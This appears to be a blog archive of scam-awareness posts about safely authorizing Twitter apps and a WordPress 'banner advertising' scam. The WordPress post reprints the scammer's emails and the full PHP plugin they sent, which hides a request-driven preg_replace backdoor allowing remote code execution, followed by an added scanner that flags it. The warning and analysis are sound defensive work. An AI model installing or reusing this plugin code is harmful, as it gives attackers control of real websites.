Category Archives: Scam

Staying Safe on Twitter



There are many sites that would love to steal your Twitter password. Here’s a way to make sure they don’t.

1. Have your browser remember your password – When you sign in to Twitter, check the “Remember me” box, which lets your browser save your password. Do this ONLY if you are on your own computer, right? Don’t do this on a shared computer.

2. Only allow apps that you trust: Once you are signed in, a legitimate Twitter app gets access to your account through Twitter itself. Any app that Twitter has authorized can read your details if you are already logged in to Twitter when you add it. Makes sense, right?

3. Don’t re-enter your password – An app that is authorized by Twitter does not need your password. You’re already logged in to Twitter, and authorized apps can access your info very easily. Once you click the ALLOW button, the app takes over and does its stuff, and you can use it. Easy as pie. If an app asks for your password, it’s trying to steal or hijack your account. Once you type in your password, the app will use your account to send out tweets and DMs to all of your followers, each containing a link that tries to steal their passwords too. See how it goes?

How to Safely Add a Twitter App

Let’s add an app, just to show you what you’re looking for. I’ll use Twitter Karma as an example. I like to know who’s following me and whether I am following them or not. Twitter Karma gives me all the details on that. Head over to http://dossy.org/twitter/karma/ and this is what you’ll see:

Twitter Karma Site
Look for the 'Sign in with Twitter' button and the official Twitter logo.

 

Once you click the ‘Sign in with Twitter’ button, you’ll see this come up:

The Official Twitter Access Authorization
This is what you see on an official Twitter app site. Note that your password isn't needed.

 

Just to be safe, look for this in your browser’s URL bar:

Twitter URL in URL Window
Make sure the real Twitter address is in the URL, not a fake 'twitter-ish' URL.

 

The site is ‘twitter.com’, the real Twitter URL. The https is a nice touch, too: it means your connection to the site is encrypted.
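The check above (real host, real https) is easy to get wrong by eye, because a fake address only has to contain the word "twitter" somewhere. The following is an added example, not code from the post or from Twitter: it parses the address the way a browser does and decides on the host name alone. The list of legitimate hosts and the sample addresses are assumptions constructed for the example.

```python
from urllib.parse import urlsplit

# Hosts where the real "Sign in with Twitter" authorization page lives
# (assumed for this example; extend it if Twitter uses another host).
LEGIT_HOSTS = {"twitter.com", "api.twitter.com"}


def check_auth_url(url: str):
    """Return (ok, reason) for the address shown while an app asks for access.

    The decision is made on the parsed host name, not on whether the text
    contains the word 'twitter', so look-alike addresses are rejected.
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    if parts.scheme != "https":
        return False, "not https: the connection is not encrypted"
    if host in LEGIT_HOSTS:
        return True, "real Twitter host over https"
    if "twitter" in host:
        return False, f"twitter-ish look-alike host: {host}"
    return False, f"not a Twitter host: {host}"


# Constructed sample addresses, genuine and fake, to run the check against.
SAMPLES = [
    "https://twitter.com/oauth/authorize?oauth_token=abc",  # genuine
    "https://api.twitter.com/oauth/authenticate",          # genuine
    "http://twitter.com/oauth/authorize",                  # right host, no https
    "https://twitter.com.login-check.example/oauth",       # twitter.com is only a prefix of the host
    "https://twitter.com@evil.example/oauth/authorize",    # 'twitter.com' is the user part; host is evil.example
    "https://twitter-login.example/oauth",                 # look-alike host
]

if __name__ == "__main__":
    for url in SAMPLES:
        ok, reason = check_auth_url(url)
        print("OK " if ok else "BAD", url, "->", reason)
```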

After you’ve clicked your way through these windows, you’ll see something like this:

Successful Log In Menu
Now you're logged in, all without giving up your password.

 

If you follow these steps when adding a Twitter app, you’ll be safe. Look for improper URLs, password requests, etc. If the app looks suspicious, it probably is. Twitter is just fine by itself; the apps are fun but not totally necessary. Hopefully, with this blog post, you’ll manage to stay safe out there!

Thanks for reading.



WordPress Scam


There is a WordPress advertising scam going around now. Here are the details of it. If you own a WordPress site, this is important reading. Please try to follow the whole post to the end.

1. The first contact is through a comment on your site. This is the comment (details may vary somewhat):

“Hi,
Sorry I write you via comments. But I could not find contact e-mail or feedback form on your site.
We are looking for new advertisement platforms and we are interested in your site http://www.kitchenrenovation411.com.
Is it possible to place banner on your site on a fee basis?
Please, contact us at e-mail.
Best regards,
Mathis Gaillard.
site: http://www.izidaagency.com
e-mail: mgaillard @izidaagency.com
phone: + (0)9 78 62 91 00”


2. Once you email the person, this is the reply:

> From: mgaillard@izidaagency.com
> To: my email
> Subject: Re: re: kitchenrenovation411.com
> Date: Thu, 10 Nov 2011 02:39:40 -0800
>
> Hello,
>
> Thanks for reply to our proposal!
>
> I represent Izida Agency. At the moment we are preparing an advertising campaign for Lacoste Company (it is a French company producing clothes, footwear, perfumery etc.) We already have designed banners for the campaign, they are the following sizes: 160×600, 240×400, 300×250, 336×280, 468×60, 728×90.
> What can be your price for one banner (banner should appear at ALL pages of your site) of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? Please mention a normal link for banner, without javascript code and set prices in US dollars per month.
> Here you can see our banners: http://docs.izidaagency.com/lacoste/?view=1
>
> Best regards,
> Mathis Gaillard.
> site: www.izidaagency.com
> e-mail: mgaillard@izidaagency.com
> phone: + (0)9 78 62 91 00

3. After some questioning on my part, I received this email:

Hi!
Before placing banner, your site need to be approved by the advertiser.
If you agree with it we'll send you special plugin, that
lets advertiser check your site and decide if it fits his requirements.

Best regards, 
Mathis Gaillard.
site: www.izidaagency.com
e-mail: mgaillard@izidaagency.com
phone: + (0)9 78 62 91 00

4. Finally, I get this email, complete with a password:

Hi!

 

Thanks for reply to our proposal!

We like your price.

To pass to the banner control system follow the link http://webmaster.izidaagency.com

To enter use the following data:

 

login: my other site

password: email me for password

 

You should install and activate the plugin in order to display advertisement.

Before making payment, advertiser must approve location of the banner.

The banner will be shown on your site when you add special code to your web- address

(for example: http://www.my other site.com/?adv_test=1).

It means, that visitors will see the banner only if it is approved and payment made.

To get installation instruction for your site type pass to: http://docs.izidaagency.com/wp_install

To activate your site you have to enter the code: GQP-HFA-55H

 

What way of payment is suitable for you?

 

Best regards,

Mathis Gaillard.

site: www.izidaagency.com

e-mail: mgaillard@izidaagency.com

phone: + (0)9 78 62 91 00

5. OK, now I have the code. What do I do with it? The file that I downloaded is a PHP script that I am supposed to upload to my WordPress site. Here is the actual code that was sent:

_____________________________________________________________________________________________

<?php

/*
  Plugin Name: ADV
  Description: ADV Plugin
  Version: 2.6.1
 */

class AdvWidget extends WP_Widget {

    function AdvWidget() {
        parent::WP_Widget(false, $name = 'AdvWidget');
    }

    /** @see WP_Widget::widget */
    function widget($args, $instance) {
        if (get_option('adv_place') == 'widget')
            advShowBanner();
    }

    /** @see WP_Widget::update */
    function update($new_instance, $old_instance) {
        $instance = $old_instance;
        $instance['title'] = strip_tags($new_instance['title']);
        return $instance;
    }

    function form($instance) {

    }

}

add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));

add_action('admin_menu', 'advPluginMenu');

register_activation_hook(__FILE__, 'advActivation');

define('ADV_SERVICE_DOMAIN', 'izidaagency.com');
define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key');

function advReadUrl($url) {
    if (function_exists('curl_init')) {
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } else
        return file_get_contents($url);
}

function advActivation() {
    update_option('adv_place', 'widget');
}

register_deactivation_hook(__FILE__, 'advDeactivation');

function advDeactivation() {
    delete_option('adv_key');
}

function advPluginMenu() {
    add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions');
}

function adv_show_banner() {
    advShowBanner();
}

function advShowBanner() {
    $advBanner = get_option('adv_banner');
    $advMode = get_option('adv_mode');
    if ($advBanner) {
        if (isset($_REQUEST['adv_test']) || $advMode == 'work') {
            echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>";
        }
    }
}

function activateCode() {
    $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST']));
    if (strpos($data, '<key>true</key>') !== FALSE) {
        preg_match("#<width>(.+?)</width>#", $data, $arr);
        update_option('adv_width', $arr[1]);
        preg_match("#<height>(.+?)</height>#", $data, $arr);
        update_option('adv_height', $arr[1]);
        echo '<div id="message"><p>The code is activated successfully.</p></div>';
        update_option('adv_key', $_REQUEST['key']);
        downloadBanners();
    } else {
        echo '<div id="message"><p>Code activation error.</p></div>';
    }
}

function downloadBanners() {
    $bannersDir = ABSPATH . "/adv_banners";
    if (!is_dir($bannersDir)) {
        mkdir($bannersDir);
    }
    $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key"));
    preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners);
    preg_match("|<adv>(.+?)</adv>|", $list, $adv);
    preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner);
    preg_match("|<mode>(.+?)</mode>|", $list, $mode);
    if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) {
        update_option("adv_banner", $showBanner[1]);
        update_option('adv_mode', $mode[1]);
        foreach ($banners[1] as $banner) {
            $advBannerDir = $bannersDir . "/" . $adv[1];
            if (!is_dir($advBannerDir))
                mkdir($advBannerDir);
            $arr = explode("/", $banner);
            if (count($arr) == 2) {
                $size = $arr[0];
                $bfile = $arr[1];
                if (!is_dir($advBannerDir . "/" . $size))
                    mkdir($advBannerDir . "/" . $size);
                file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));
            }
        }
        echo '<div id="message"><p>Banners are downloaded successfully.</p></div>';
    }
}

if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');

function advPluginOptions() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }
    $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
    if ($action == 'downloadBanners') {
        downloadBanners();
    } elseif ($action == 'setPlace') {
        update_option('adv_place', $_REQUEST['adv_place']);
    } elseif ($action == 'saveKey') {
        activateCode();
    }

    $advPlace = get_option('adv_place');
    echo '<div>';

    echo '<h2>ADV</h2>';
    echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">';
    echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>';
    echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>';
    echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>';
    echo '</select>';
    echo '<input type="submit" value="Save"/></form>';
    echo '<div>';
    if (get_option('adv_key') === FALSE) {
        echo '<h2>Activation Code</h2>';
        echo '<form method="post" action="?page=adv-identifier&action=saveKey">';
        echo '<input type="text" name="key"/>';
        echo '<input type="submit" value="Activate"/>';
        echo '</form>';
    } else {
        $mode = get_option('adv_mode');
        echo '<br/>Code: ' . get_option('adv_key');
        echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>';
        echo 'Mode: ' . $mode;
        if ($mode != 'work') {
            $url = get_option('siteurl') . "/?adv_test=1";
            $link = "<a href='$url'>$url</a>";
            echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment.
To see where the banner will be placed on your site, use the special feature in the site address: ' . $link;
        }
    }
    echo '</div>';
    echo '</div>';}?>

_____________________________________________________________________________
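One part of the script deserves a closer look than the banner code: the top-level `preg_replace` near the end takes both its pattern and its replacement straight from `$_POST`, runs on every request that loads the plugin, and sits outside the `manage_options` check that the options page has. On the PHP versions current in 2011, a pattern carrying the `e` modifier makes `preg_replace` evaluate the replacement as PHP code, which turns that one line into a remote code execution backdoor. Below is an added static check, my code and not part of the post, that flags that construct and the other indicators visible in the plugin (runtime code generation with `create_function`, request parameters forwarded to an outside server, remote content written into the web root). The sample it scans is a constructed excerpt of the script above, and the rules are line-oriented heuristics, not a full PHP parser.

```python
import re

# Constructed sample (an excerpt, not the full plugin): the tell-tale lines from
# the script above plus one benign line, so the scanner can run offline.
SAMPLE_PLUGIN = r"""<?php
add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));
$data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key']);
file_put_contents($advBannerDir . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $banner));
if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');
echo "<p>hello</p>";
"""

SUPERGLOBAL = r"\$_(?:POST|GET|REQUEST|COOKIE)\b"

# One rule per indicator present in the plugin: (name, regex, why a reviewer should care).
RULES = [
    ("preg_replace_from_request", re.compile(r"preg_replace\s*\([^;]*" + SUPERGLOBAL),
     "pattern/replacement come from the request; with the 'e' modifier (PHP < 7) "
     "the replacement is evaluated as PHP code, i.e. a remote code execution backdoor"),
    ("create_function", re.compile(r"\bcreate_function\s*\("),
     "builds a function from a string at runtime (eval in disguise)"),
    ("request_in_outbound_query", re.compile(r"[?&]\w+=[^;]*" + SUPERGLOBAL),
     "request parameters are forwarded to an outside server that then steers the plugin"),
    ("remote_content_to_disk", re.compile(r"file_put_contents\s*\([^;]*https?://"),
     "content fetched from a remote host is written under the web root"),
]


def scan_php(source: str) -> list:
    """Line-oriented scan: one finding per (line, rule) hit, 1-based line numbers.

    Assumes each suspicious call sits on a single line, as in the plugin above;
    join continuation lines first if a call is wrapped.
    """
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern, why in RULES:
            if pattern.search(line):
                findings.append({"line": lineno, "rule": name, "why": why,
                                 "code": line.strip()})
    return findings


if __name__ == "__main__":
    for f in scan_php(SAMPLE_PLUGIN):
        print(f"line {f['line']:>3}  {f['rule']:<26}  {f['why']}")
```

Run it over a plugin file before activating anything a stranger sends you; a hit on the first rule alone is reason enough to delete the file rather than upload it.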

This isn’t a new scam. It’s been around for a few months or longer. Here is a link to another page which explains the same thing but from a different contact person:

http://keepsafeonthenet.co.uk/2011/07/martin-dumont/comment-page-1/#comment-87860

 

My comments are at the bottom of that page.

I have my feelers out now to see what this script does. There is a chance that it’s a trojan of some kind and it may not even be active after it’s installed. I can only assume that it will, at a future date, provide access to a WordPress site. If anyone can decipher the script, please do so and contact me using the comment section below.

I should say that the site this comment was on is a new site, very small with very little traffic. I have tried to contact Izod Lacoste but, so far, they have not emailed me back. If you have been affected by this scam, please comment below. The more we know about this, the safer the WordPress community will be.

Thanks for reading!